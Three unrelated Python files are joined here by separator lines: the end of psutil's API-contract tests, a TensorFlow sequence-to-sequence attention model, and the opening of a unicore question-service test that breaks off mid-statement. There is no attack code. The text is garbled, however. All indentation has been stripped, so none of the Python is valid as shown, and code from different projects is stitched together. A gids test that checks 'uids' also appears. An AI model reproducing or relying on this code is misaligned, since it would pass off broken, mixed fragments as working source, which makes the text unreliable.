ae(hasattr(psutil, "ABOVE_NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "BELOW_NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "HIGH_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "IDLE_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "REALTIME_PRIORITY_CLASS"), WINDOWS)
def test_linux_ioprio_linux(self):
ae = self.assertEqual
ae(hasattr(psutil, "IOPRIO_CLASS_NONE"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_RT"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_BE"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_IDLE"), LINUX)
def test_linux_ioprio_windows(self):
ae = self.assertEqual
ae(hasattr(psutil, "IOPRIO_HIGH"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_NORMAL"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_LOW"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_VERYLOW"), WINDOWS)
@unittest.skipIf(GITHUB_ACTIONS and LINUX,
"unsupported on GITHUB_ACTIONS + LINUX")
def test_rlimit(self):
ae = self.assertEqual
ae(hasattr(psutil, "RLIM_INFINITY"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_AS"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_CORE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_CPU"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_DATA"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_FSIZE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_MEMLOCK"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_NOFILE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_NPROC"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_RSS"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_STACK"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_LOCKS"), LINUX)
if POSIX:
if kernel_version() >= (2, 6, 8):
ae(hasattr(psutil, "RLIMIT_MSGQUEUE"), LINUX)
if kernel_version() >= (2, 6, 12):
ae(hasattr(psutil, "RLIMIT_NICE"), LINUX)
if kernel_version() >= (2, 6, 12):
ae(hasattr(psutil, "RLIMIT_RTPRIO"), LINUX)
if kernel_version() >= (2, 6, 25):
ae(hasattr(psutil, "RLIMIT_RTTIME"), LINUX)
if kernel_version() >= (2, 6, 8):
ae(hasattr(psutil, "RLIMIT_SIGPENDING"), LINUX)
ae(hasattr(psutil, "RLIMIT_SWAP"), FREEBSD)
ae(hasattr(psutil, "RLIMIT_SBSIZE"), FREEBSD)
ae(hasattr(psutil, "RLIMIT_NPTS"), FREEBSD)
class TestAvailSystemAPIs(PsutilTestCase):
def test_win_service_iter(self):
self.assertEqual(hasattr(psutil, "win_service_iter"), WINDOWS)
def test_win_service_get(self):
self.assertEqual(hasattr(psutil, "win_service_get"), WINDOWS)
def test_cpu_freq(self):
self.assertEqual(hasattr(psutil, "cpu_freq"),
LINUX or MACOS or WINDOWS or FREEBSD or OPENBSD)
def test_sensors_temperatures(self):
self.assertEqual(
hasattr(psutil, "sensors_temperatures"), LINUX or FREEBSD)
def test_sensors_fans(self):
self.assertEqual(hasattr(psutil, "sensors_fans"), LINUX)
def test_battery(self):
self.assertEqual(hasattr(psutil, "sensors_battery"),
LINUX or WINDOWS or FREEBSD or MACOS)
class TestAvailProcessAPIs(PsutilTestCase):
def test_environ(self):
self.assertEqual(hasattr(psutil.Process, "environ"),
LINUX or MACOS or WINDOWS or AIX or SUNOS or
FREEBSD or OPENBSD or NETBSD)
def test_uids(self):
self.assertEqual(hasattr(psutil.Process, "uids"), POSIX)
def test_gids(self):
self.assertEqual(hasattr(psutil.Process, "uids"), POSIX)
def test_terminal(self):
self.assertEqual(hasattr(psutil.Process, "terminal"), POSIX)
def test_ionice(self):
self.assertEqual(hasattr(psutil.Process, "ionice"), LINUX or WINDOWS)
@unittest.skipIf(GITHUB_ACTIONS and LINUX,
"unsupported on GITHUB_ACTIONS + LINUX")
def test_rlimit(self):
self.assertEqual(hasattr(psutil.Process, "rlimit"), LINUX or FREEBSD)
def test_io_counters(self):
hasit = hasattr(psutil.Process, "io_counters")
self.assertEqual(hasit, False if MACOS or SUNOS else True)
def test_num_fds(self):
self.assertEqual(hasattr(psutil.Process, "num_fds"), POSIX)
def test_num_handles(self):
self.assertEqual(hasattr(psutil.Process, "num_handles"), WINDOWS)
def test_cpu_affinity(self):
self.assertEqual(hasattr(psutil.Process, "cpu_affinity"),
LINUX or WINDOWS or FREEBSD)
def test_cpu_num(self):
self.assertEqual(hasattr(psutil.Process, "cpu_num"),
LINUX or FREEBSD or SUNOS)
def test_memory_maps(self):
hasit = hasattr(psutil.Process, "memory_maps")
self.assertEqual(
hasit, False if OPENBSD or NETBSD or AIX or MACOS else True)
# ===================================================================
# --- API types
# ===================================================================
class TestSystemAPITypes(PsutilTestCase):
"""Check the return types of system related APIs.
Mainly we want to test we never return unicode on Python 2, see:
https://github.com/giampaolo/psutil/issues/1039
"""
@classmethod
def setUpClass(cls):
cls.proc = psutil.Process()
def assert_ntuple_of_nums(self, nt, type_=float, gezero=True):
assert is_namedtuple(nt)
for n in nt:
self.assertIsInstance(n, type_)
if gezero:
self.assertGreaterEqual(n, 0)
def test_cpu_times(self):
self.assert_ntuple_of_nums(psutil.cpu_times())
for nt in psutil.cpu_times(percpu=True):
self.assert_ntuple_of_nums(nt)
def test_cpu_percent(self):
self.assertIsInstance(psutil.cpu_percent(interval=None), float)
self.assertIsInstance(psutil.cpu_percent(interval=0.00001), float)
def test_cpu_times_percent(self):
self.assert_ntuple_of_nums(psutil.cpu_times_percent(interval=None))
self.assert_ntuple_of_nums(psutil.cpu_times_percent(interval=0.0001))
def test_cpu_count(self):
self.assertIsInstance(psutil.cpu_count(), int)
@unittest.skipIf(not HAS_CPU_FREQ, "not supported")
def test_cpu_freq(self):
if psutil.cpu_freq() is None:
raise self.skipTest("cpu_freq() returns None")
self.assert_ntuple_of_nums(psutil.cpu_freq(), type_=(float, int, long))
def test_disk_io_counters(self):
# Duplicate of test_system.py. Keep it anyway.
for k, v in psutil.disk_io_counters(perdisk=True).items():
self.assertIsInstance(k, str)
self.assert_ntuple_of_nums(v, type_=(int, long))
def test_disk_partitions(self):
# Duplicate of test_system.py. Keep it anyway.
for disk in psutil.disk_partitions():
self.assertIsInstance(disk.device, str)
self.assertIsInstance(disk.mountpoint, str)
self.assertIsInstance(disk.fstype, str)
self.assertIsInstance(disk.opts, str)
self.assertIsInstance(disk.maxfile, int)
self.assertIsInstance(disk.maxpath, int)
@unittest.skipIf(SKIP_SYSCONS, "requires root")
def test_net_connections(self):
with create_sockets():
ret = psutil.net_connections('all')
self.assertEqual(len(ret), len(set(ret)))
for conn in ret:
assert is_namedtuple(conn)
def test_net_if_addrs(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, addrs in psutil.net_if_addrs().items():
self.assertIsInstance(ifname, str)
for addr in addrs:
if enum is not None and not PYPY:
self.assertIsInstance(addr.family, enum.IntEnum)
else:
self.assertIsInstance(addr.family, int)
self.assertIsInstance(addr.address, str)
self.assertIsInstance(addr.netmask, (str, type(None)))
self.assertIsInstance(addr.broadcast, (str, type(None)))
def test_net_if_stats(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, info in psutil.net_if_stats().items():
self.assertIsInstance(ifname, str)
self.assertIsInstance(info.isup, bool)
if enum is not None:
self.assertIsInstance(info.duplex, enum.IntEnum)
else:
self.assertIsInstance(info.duplex, int)
self.assertIsInstance(info.speed, int)
self.assertIsInstance(info.mtu, int)
@unittest.skipIf(not HAS_NET_IO_COUNTERS, 'not supported')
def test_net_io_counters(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, _ in psutil.net_io_counters(pernic=True).items():
self.assertIsInstance(ifname, str)
@unittest.skipIf(not HAS_SENSORS_FANS, "not supported")
def test_sensors_fans(self):
# Duplicate of test_system.py. Keep it anyway.
for name, units in psutil.sensors_fans().items():
self.assertIsInstance(name, str)
for unit in units:
self.assertIsInstance(unit.label, str)
self.assertIsInstance(unit.current, (float, int, type(None)))
@unittest.skipIf(not HAS_SENSORS_TEMPERATURES, "not supported")
def test_sensors_temperatures(self):
# Duplicate of test_system.py. Keep it anyway.
for name, units in psutil.sensors_temperatures().items():
self.assertIsInstance(name, str)
for unit in units:
self.assertIsInstance(unit.label, str)
self.assertIsInstance(unit.current, (float, int, type(None)))
self.assertIsInstance(unit.high, (float, int, type(None)))
self.assertIsInstance(unit.critical, (float, int, type(None)))
def test_boot_time(self):
# Duplicate of test_system.py. Keep it anyway.
self.assertIsInstance(psutil.boot_time(), float)
def test_users(self):
# Duplicate of test_system.py. Keep it anyway.
for user in psutil.users():
self.assertIsInstance(user.name, str)
self.assertIsInstance(user.terminal, (str, type(None)))
self.assertIsInstance(user.host, (str, type(None)))
self.assertIsInstance(user.pid, (int, type(None)))
class TestProcessWaitType(PsutilTestCase):
@unittest.skipIf(not POSIX, "not POSIX")
def test_negative_signal(self):
p = psutil.Process(self.spawn_testproc().pid)
p.terminate()
code = p.wait()
self.assertEqual(code, -signal.SIGTERM)
if enum is not None:
self.assertIsInstance(code, enum.IntEnum)
else:
self.assertIsInstance(code, int)
# ===================================================================
# --- Featch all processes test
# ===================================================================
def proc_info(pid):
tcase = PsutilTestCase()
def check_exception(exc, proc, name, ppid):
tcase.assertEqual(exc.pid, pid)
tcase.assertEqual(exc.name, name)
if isinstance(exc, psutil.ZombieProcess):
if exc.ppid is not None:
tcase.assertGreaterEqual(exc.ppid, 0)
tcase.assertEqual(exc.ppid, ppid)
elif isinstance(exc, psutil.NoSuchProcess):
tcase.assertProcessGone(proc)
str(exc)
def do_wait():
if pid != 0:
try:
proc.wait(0)
except psutil.Error as exc:
check_exception(exc, proc, name, ppid)
try:
proc = psutil.Process(pid)
d = proc.as_dict(['ppid', 'name'])
except psutil.NoSuchProcess:
return {}
name, ppid = d['name'], d['ppid']
info = {'pid': proc.pid}
ns = process_namespace(proc)
# We don't use oneshot() because in order not to fool
# check_exception() in case of NSP.
for fun, fun_name in ns.iter(ns.getters, clear_cache=False):
try:
info[fun_name] = fun()
except psutil.Error as exc:
check_exception(exc, proc, name, ppid)
continue
do_wait()
return info
@serialrun
class TestFetchAllProcesses(PsutilTestCase):
"""Test which iterates over all running processes and performs
some sanity checks against Process API's returned values.
Uses a process pool to get info about all processes.
"""
def setUp(self):
self.pool = multiprocessing.Pool()
def tearDown(self):
self.pool.terminate()
self.pool.join()
def iter_proc_info(self):
# Fixes "can't pickle <function proc_info>: it's not the
# same object as test_contracts.proc_info".
from psutil.tests.test_contracts import proc_info
return self.pool.imap_unordered(proc_info, psutil.pids())
def test_all(self):
failures = []
for info in self.iter_proc_info():
for name, value in info.items():
meth = getattr(self, name)
try:
meth(value, info)
except AssertionError:
s = '\n' + '=' * 70 + '\n'
s += "FAIL: test_%s pid=%s, ret=%s\n" % (
name, info['pid'], repr(value))
s += '-' * 70
s += "\n%s" % traceback.format_exc()
s = "\n".join((" " * 4) + i for i in s.splitlines())
s += '\n'
failures.append(s)
else:
if value not in (0, 0.0, [], None, '', {}):
assert value, value
if failures:
raise self.fail(''.join(failures))
def cmdline(self, ret, info):
self.assertIsInstance(ret, list)
for part in ret:
self.assertIsInstance(part, str)
def exe(self, ret, info):
self.assertIsInstance(ret, (str, type(None)))
if not ret:
self.assertEqual(ret, '')
else:
if WINDOWS and not ret.endswith('.exe'):
return # May be "Registry", "MemCompression", ...
assert os.path.isabs(ret), ret
# Note: os.stat() may return False even if the file is there
# hence we skip the test, see:
# http://stackoverflow.com/questions/3112546/os-path-exists-lies
if POSIX and os.path.isfile(ret):
if hasattr(os, 'access') and hasattr(os, "X_OK"):
# XXX: may fail on MACOS
try:
assert os.access(ret, os.X_OK)
except AssertionError:
if os.path.exists(ret) and not CI_TESTING:
raise
def pid(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def ppid(self, ret, info):
self.assertIsInstance(ret, (int, long))
self.assertGreaterEqual(ret, 0)
def name(self, ret, info):
self.assertIsInstance(ret, str)
if APPVEYOR and not ret and info['status'] == 'stopped':
return
# on AIX, "<exiting>" processes don't have names
if not AIX:
assert ret
def create_time(self, ret, info):
self.assertIsInstance(ret, float)
try:
self.assertGreaterEqual(ret, 0)
except AssertionError:
# XXX
if OPENBSD and info['status'] == psutil.STATUS_ZOMBIE:
pass
else:
raise
# this can't be taken for granted on all platforms
# self.assertGreaterEqual(ret, psutil.boot_time())
# make sure returned value can be pretty printed
# with strftime
time.strftime("%Y %m %d %H:%M:%S", time.localtime(ret))
def uids(self, ret, info):
assert is_namedtuple(ret)
for uid in ret:
self.assertIsInstance(uid, int)
self.assertGreaterEqual(uid, 0)
def gids(self, ret, info):
assert is_namedtuple(ret)
# note: testing all gids as above seems not to be reliable for
# gid == 30 (nodoby); not sure why.
for gid in ret:
self.assertIsInstance(gid, int)
if not MACOS and not NETBSD:
self.assertGreaterEqual(gid, 0)
def username(self, ret, info):
self.assertIsInstance(ret, str)
assert ret
def status(self, ret, info):
self.assertIsInstance(ret, str)
assert ret
self.assertNotEqual(ret, '?') # XXX
self.assertIn(ret, VALID_PROC_STATUSES)
def io_counters(self, ret, info):
assert is_namedtuple(ret)
for field in ret:
self.assertIsInstance(field, (int, long))
if field != -1:
self.assertGreaterEqual(field, 0)
def ionice(self, ret, info):
if LINUX:
self.assertIsInstance(ret.ioclass, int)
self.assertIsInstance(ret.value, int)
self.assertGreaterEqual(ret.ioclass, 0)
self.assertGreaterEqual(ret.value, 0)
else: # Windows, Cygwin
choices = [
psutil.IOPRIO_VERYLOW,
psutil.IOPRIO_LOW,
psutil.IOPRIO_NORMAL,
psutil.IOPRIO_HIGH]
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
self.assertIn(ret, choices)
def num_threads(self, ret, info):
self.assertIsInstance(ret, int)
if APPVEYOR and not ret and info['status'] == 'stopped':
return
self.assertGreaterEqual(ret, 1)
def threads(self, ret, info):
self.assertIsInstance(ret, list)
for t in ret:
assert is_namedtuple(t)
self.assertGreaterEqual(t.id, 0)
self.assertGreaterEqual(t.user_time, 0)
self.assertGreaterEqual(t.system_time, 0)
for field in t:
self.assertIsInstance(field, (int, float))
def cpu_times(self, ret, info):
assert is_namedtuple(ret)
for n in ret:
self.assertIsInstance(n, float)
self.assertGreaterEqual(n, 0)
# TODO: check ntuple fields
def cpu_percent(self, ret, info):
self.assertIsInstance(ret, float)
assert 0.0 <= ret <= 100.0, ret
def cpu_num(self, ret, info):
self.assertIsInstance(ret, int)
if FREEBSD and ret == -1:
return
self.assertGreaterEqual(ret, 0)
if psutil.cpu_count() == 1:
self.assertEqual(ret, 0)
self.assertIn(ret, list(range(psutil.cpu_count())))
def memory_info(self, ret, info):
assert is_namedtuple(ret)
for value in ret:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
if WINDOWS:
self.assertGreaterEqual(ret.peak_wset, ret.wset)
self.assertGreaterEqual(ret.peak_paged_pool, ret.paged_pool)
self.assertGreaterEqual(ret.peak_nonpaged_pool, ret.nonpaged_pool)
self.assertGreaterEqual(ret.peak_pagefile, ret.pagefile)
def memory_full_info(self, ret, info):
assert is_namedtuple(ret)
total = psutil.virtual_memory().total
for name in ret._fields:
value = getattr(ret, name)
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0, msg=(name, value))
if LINUX or OSX and name in ('vms', 'data'):
# On Linux there are processes (e.g. 'goa-daemon') whose
# VMS is incredibly high for some reason.
continue
self.assertLessEqual(value, total, msg=(name, value, total))
if LINUX:
self.assertGreaterEqual(ret.pss, ret.uss)
def open_files(self, ret, info):
self.assertIsInstance(ret, list)
for f in ret:
self.assertIsInstance(f.fd, int)
self.assertIsInstance(f.path, str)
if WINDOWS:
self.assertEqual(f.fd, -1)
elif LINUX:
self.assertIsInstance(f.position, int)
self.assertIsInstance(f.mode, str)
self.assertIsInstance(f.flags, int)
self.assertGreaterEqual(f.position, 0)
self.assertIn(f.mode, ('r', 'w', 'a', 'r+', 'a+'))
self.assertGreater(f.flags, 0)
elif BSD and not f.path:
# XXX see: https://github.com/giampaolo/psutil/issues/595
continue
assert os.path.isabs(f.path), f
try:
st = os.stat(f.path)
except FileNotFoundError:
pass
else:
assert stat.S_ISREG(st.st_mode), f
def num_fds(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def connections(self, ret, info):
with create_sockets():
self.assertEqual(len(ret), len(set(ret)))
for conn in ret:
assert is_namedtuple(conn)
check_connection_ntuple(conn)
def cwd(self, ret, info):
if ret: # 'ret' can be None or empty
self.assertIsInstance(ret, str)
assert os.path.isabs(ret), ret
try:
st = os.stat(ret)
except OSError as err:
if WINDOWS and err.errno in \
psutil._psplatform.ACCESS_DENIED_SET:
pass
# directory has been removed in mean time
elif err.errno != errno.ENOENT:
raise
else:
assert stat.S_ISDIR(st.st_mode)
def memory_percent(self, ret, info):
self.assertIsInstance(ret, float)
assert 0 <= ret <= 100, ret
def is_running(self, ret, info):
self.assertIsInstance(ret, bool)
def cpu_affinity(self, ret, info):
self.assertIsInstance(ret, list)
assert ret != [], ret
cpus = list(range(psutil.cpu_count()))
for n in ret:
self.assertIsInstance(n, int)
self.assertIn(n, cpus)
def terminal(self, ret, info):
self.assertIsInstance(ret, (str, type(None)))
if ret is not None:
assert os.path.isabs(ret), ret
assert os.path.exists(ret), ret
def memory_maps(self, ret, info):
for nt in ret:
self.assertIsInstance(nt.addr, str)
self.assertIsInstance(nt.perms, str)
self.assertIsInstance(nt.path, str)
for fname in nt._fields:
value = getattr(nt, fname)
if fname == 'path':
if not value.startswith('['):
assert os.path.isabs(nt.path), nt.path
# commented as on Linux we might get
# '/foo/bar (deleted)'
# assert os.path.exists(nt.path), nt.path
elif fname == 'addr':
assert value, repr(value)
elif fname == 'perms':
if not WINDOWS:
assert value, repr(value)
else:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
def num_handles(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def nice(self, ret, info):
self.assertIsInstance(ret, int)
if POSIX:
assert -20 <= ret <= 20, ret
else:
priorities = [getattr(psutil, x) for x in dir(psutil)
if x.endswith('_PRIORITY_CLASS')]
self.assertIn(ret, priorities)
if sys.version_info > (3, 4):
self.assertIsInstance(ret, enum.IntEnum)
else:
self.assertIsInstance(ret, int)
def num_ctx_switches(self, ret, info):
assert is_namedtuple(ret)
for value in ret:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
def rlimit(self, ret, info):
self.assertIsInstance(ret, tuple)
self.assertEqual(len(ret), 2)
self.assertGreaterEqual(ret[0], -1)
self.assertGreaterEqual(ret[1], -1)
def environ(self, ret, info):
self.assertIsInstance(ret, dict)
for k, v in ret.items():
self.assertIsInstance(k, str)
self.assertIsInstance(v, str)
if __name__ == '__main__':
from psutil.tests.runner import run_from_name
run_from_name(__file__)
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence-to-sequence model with an attention mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from book_code.chapter_05 import data_utils
class Seq2SeqModel(object):
"""Sequence-to-sequence model with attention and for multiple buckets.
This class implements a multi-layer recurrent neural network as encoder,
and an attention-based decoder. This is the same as the model described in
this paper: http://arxiv.org/abs/1412.7449 - please look there for details,
or into the seq2seq library for complete model implementation.
This class also allows to use GRU cells in addition to LSTM cells, and
sampled softmax to handle large output vocabulary size. A single-layer
version of this model, but with bi-directional encoder, was presented in
http://arxiv.org/abs/1409.0473
and sampled softmax is described in Section 3 of the following paper.
http://arxiv.org/abs/1412.2007
"""
def __init__(self, source_vocab_size, target_vocab_size, buckets, size,
num_layers, max_gradient_norm, batch_size, learning_rate,
learning_rate_decay_factor, use_lstm=False,
num_samples=512, forward_only=False):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.learning_rate_decay_op = self.learning_rate.assign(
self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
# If we use sampled softmax, we need an output projection.
output_projection = None
softmax_loss_function = None
# Sampled softmax only makes sense if we sample less than vocabulary size.
if num_samples > 0 and num_samples < self.target_vocab_size:
with tf.device("/cpu:0"):
w = tf.get_variable("proj_w", [size, self.target_vocab_size])
w_t = tf.transpose(w)
b = tf.get_variable("proj_b", [self.target_vocab_size])
output_projection = (w, b)
def sampled_loss(inputs, labels):
with tf.device("/cpu:0"):
labels = tf.reshape(labels, [-1, 1])
return tf.nn.sampled_softmax_loss(w_t, b, inputs, labels, num_samples,
self.target_vocab_size)
softmax_loss_function = sampled_loss
# Create the internal multi-layer cell for our RNN.
single_cell = tf.nn.rnn_cell.GRUCell(size)
if use_lstm:
single_cell = tf.nn.rnn_cell.BasicLSTMCell(size)
cell = single_cell
if num_layers > 1:
cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * num_layers)
# The seq2seq function: we use embedding for the input and attention.
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return tf.nn.seq2seq.embedding_attention_seq2seq(
encoder_inputs, decoder_inputs, cell,
num_encoder_symbols=source_vocab_size,
num_decoder_symbols=target_vocab_size,
embedding_size=size,
output_projection=output_projection,
feed_previous=do_decode)
# Feeds for inputs.
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]): # Last bucket is the biggest one.
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="encoder{0}".format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="decoder{0}".format(i)))
self.target_weights.append(tf.placeholder(tf.float32, shape=[None],
name="weight{0}".format(i)))
# Our targets are decoder inputs shifted by one.
targets = [self.decoder_inputs[i + 1]
for i in xrange(len(self.decoder_inputs) - 1)]
# Training outputs and losses.
if forward_only:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True),
softmax_loss_function=softmax_loss_function)
# If we use output projection, we need to project outputs for decoding.
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [
tf.matmul(output, output_projection[0]) + output_projection[1]
for output in self.outputs[b]
]
else:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets,
lambda x, y: seq2seq_f(x, y, False),
softmax_loss_function=softmax_loss_function)
# Gradients and SGD update operation for training the model.
params = tf.trainable_variables()
if not forward_only:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
clipped_gradients, norm = tf.clip_by_global_norm(gradients,
max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(
zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.all_variables())
def step(self, session, encoder_inputs, decoder_inputs, target_weights,
bucket_id, forward_only):
"""Run a step of the model feeding the given inputs.
Args:
session: tensorflow session to use.
encoder_inputs: list of numpy int vectors to feed as encoder inputs.
decoder_inputs: list of numpy int vectors to feed as decoder inputs.
target_weights: list of numpy float vectors to feed as target weights.
bucket_id: which bucket of the model to use.
forward_only: whether to do the backward step or only forward.
Returns:
A triple consisting of gradient norm (or None if we did not do backward),
average perplexity, and the outputs.
Raises:
ValueError: if length of encoder_inputs, decoder_inputs, or
target_weights disagrees with bucket size for the specified bucket_id.
"""
# Check if the sizes match.
encoder_size, decoder_size = self.buckets[bucket_id]
if len(encoder_inputs) != encoder_size:
raise ValueError("Encoder length must be equal to the one in bucket,"
" %d != %d." % (len(encoder_inputs), encoder_size))
if len(decoder_inputs) != decoder_size:
raise ValueError("Decoder length must be equal to the one in bucket,"
" %d != %d." % (len(decoder_inputs), decoder_size))
if len(target_weights) != decoder_size:
raise ValueError("Weights length must be equal to the one in bucket,"
" %d != %d." % (len(target_weights), decoder_size))
# Input feed: encoder inputs, decoder inputs, target_weights, as provided.
input_feed = {}
for l in xrange(encoder_size):
input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]
for l in xrange(decoder_size):
input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]
input_feed[self.target_weights[l].name] = target_weights[l]
# Since our targets are decoder inputs shifted by one, we need one more.
last_target = self.decoder_inputs[decoder_size].name
input_feed[last_target] = np.zeros([self.batch_size], dtype=np.int32)
# Output feed: depends on whether we do a backward step or not.
if not forward_only:
output_feed = [self.updates[bucket_id], # Update Op that does SGD.
self.gradient_norms[bucket_id], # Gradient norm.
self.losses[bucket_id]] # Loss for this batch.
else:
output_feed = [self.losses[bucket_id]] # Loss for this batch.
for l in xrange(decoder_size): # Output logits.
output_feed.append(self.outputs[bucket_id][l])
outputs = session.run(output_feed, input_feed)
if not forward_only:
return outputs[1], outputs[2], None # Gradient norm, loss, no outputs.
else:
return None, outputs[0], outputs[1:] # No gradient norm, loss, outputs.
def get_batch(self, data, bucket_id):
"""Get a random batch of data from the specified bucket, prepare for step.
To feed data in step(..) it must be a list of batch-major vectors, while
data here contains single length-major cases. So the main logic of this
function is to re-index data cases to be in the proper format for feeding.
Args:
data: a tuple of size len(self.buckets) in which each element contains
lists of pairs of input and output data that we use to create a batch.
bucket_id: integer, which bucket to get the batch for.
Returns:
The triple (encoder_inputs, decoder_inputs, target_weights) for
the constructed batch that has the proper format to call step(...) later.
"""
encoder_size, decoder_size = self.buckets[bucket_id]
encoder_inputs, decoder_inputs = [], []
# Get a random batch of encoder and decoder inputs from data,
# pad them if needed, reverse encoder inputs and add GO to decoder.
for _ in xrange(self.batch_size):
encoder_input, decoder_input = random.choice(data[bucket_id])
# Encoder inputs are padded and then reversed.
encoder_pad = [data_utils.PAD_ID] * (encoder_size - len(encoder_input))
encoder_inputs.append(list(reversed(encoder_input + encoder_pad)))
# Decoder inputs get an extra "GO" symbol, and are padded then.
decoder_pad_size = decoder_size - len(decoder_input) - 1
decoder_inputs.append([data_utils.GO_ID] + decoder_input +
[data_utils.PAD_ID] * decoder_pad_size)
# Now we create batch-major vectors from the data selected above.
batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []
# Batch encoder inputs are just re-indexed encoder_inputs.
for length_idx in xrange(encoder_size):
batch_encoder_inputs.append(
np.array([encoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Batch decoder inputs are re-indexed decoder_inputs, we create weights.
for length_idx in xrange(decoder_size):
batch_decoder_inputs.append(
np.array([decoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Create target_weights to be 0 for targets that are padding.
batch_weight = np.ones(self.batch_size, dtype=np.float32)
for batch_idx in xrange(self.batch_size):
# We set weight to 0 if the corresponding target is a PAD symbol.
# The corresponding target is decoder_input shifted by 1 forward.
if length_idx < decoder_size - 1:
target = decoder_inputs[batch_idx][length_idx + 1]
if length_idx == decoder_size - 1 or target == data_utils.PAD_ID:
batch_weight[batch_idx] = 0.0
batch_weights.append(batch_weight)
return batch_encoder_inputs, batch_decoder_inputs, batch_weights
|
|
import uuid
from unicore.ask.service.tests import DBTestCase
from unicore.ask.service.models import QuestionOption, Question
class QuestionApiTestCase(DBTestCase):
def create_question_option(self, session=None, **attrs):
return self.create_model_object(QuestionOption, session, **attrs)
def create_question(self, session=None, **attrs):
return self.create_model_object(Question, session, **attrs)
def setUp(self):
super(QuestionApiTestCase, self).setUp()
self.question_1 = self.create_question(
self.db, title='What is your name', short_name='name',
question_type='free_text', author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.question_1_option = self.create_question_option(
self.db, question_id=self.question_1.uuid)
self.question_2 = self.create_question(
